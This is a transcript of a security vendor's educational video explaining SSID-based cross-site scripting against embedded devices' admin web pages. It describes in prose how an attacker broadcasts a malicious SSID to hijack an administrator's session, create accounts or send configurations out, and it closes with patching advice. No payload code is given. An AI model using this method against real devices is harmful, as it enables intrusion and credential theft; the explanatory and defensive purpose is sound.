SSID XSS Vulnerabilities Explained

August 03, 2016

In today’s Whiteboard Wednesday, Deral Heiland, Research Lead at Rapid7, will discuss how SSID cross site scripting (XSS) vulnerabilities work and how they are exploited.

Watch this week’s Whiteboard Wednesday to learn more.

Video Transcript

Welcome to Whiteboard Wednesday. My name is Deral Heiland, Research Lead at Rapid7.

Show more Show less

This week's Whiteboard Wednesday Exploit Explained: SSID based injections.

The first thing we want to do is talk about what an SSID is. An SSID, or service set identifier, is used to assign readable names to an 802.11 wireless network. That's so when you want to attach your device to a wireless network, you can easily identify the network you want to attach to.

An interesting trait about this, the SSID can contain up to 32 characters. For this injection attack to take place, the attacker must be able to keep his entire attack payload into 32 characters. Most of the attacks that I've experienced carried out through SSIDs are often cross-site scripting type attacks or cross-site request forgery attacks. The reason for that is, most of the devices that we've encountered are embedded devices that have web servers. These web servers are used to configure various SSID functionality. This can include everything from access points to IoT technology where you integrate that device into the existing SSID networks.

When you log onto these devices, they usually have configuration pages, or administrative pages, that are used to identify all the local wireless devices that are within reasonable proximity of that particular device. The way the attack works, the attacker will actually fire up a wireless access point. It can be a soft AP. I usually use something off Linux. I run a program that'll actually fire up an SSID. I put my cross-site scripting code in there. What happens is the embedded server gets logged onto with a browser. The person logging onto the device is typically an administrative level person, so he has escalated rights. What happens is when he views that page, the cross-site scripting will trigger, giving you the ability to carry out various attacks against that device.

The type of attacks we've actually successfully done against various devices that have this particular issue, include everything from being able to create administrative accounts on the device, to having the device actually offload its configuration containing username and password information off to third party sites.

We've discovered this, like I said, in a number of different types of devices. This is everything from wireless access points, down to IoT technology, and including wireless LAN controller technology. So it's spread across a number of different appliances that you may encounter. Like I said, it's important to note, the appliance has to be able to interact with the wireless environment for this typical attack to actually work.

This does not mean all devices are vulnerable. Often, it's only going to be devices where the actual parsing on the web page hasn't properly filtered incoming data from the SSID data.

The way to fix this, unfortunately, is often only with a patch. Most occurrences of this type of attack have been reported to the vendors, and they've released patches for this particular vulnerability. If you constantly maintain a good patching program within your environment, you're often going to be protected from this style of attack.

That's it for this week's Whiteboard Wednesday. We'll talk to you next week.

National Exposure Index

Is the internet broken? You bet. Get to know overall threat exposure on the internet in this report.

Download Report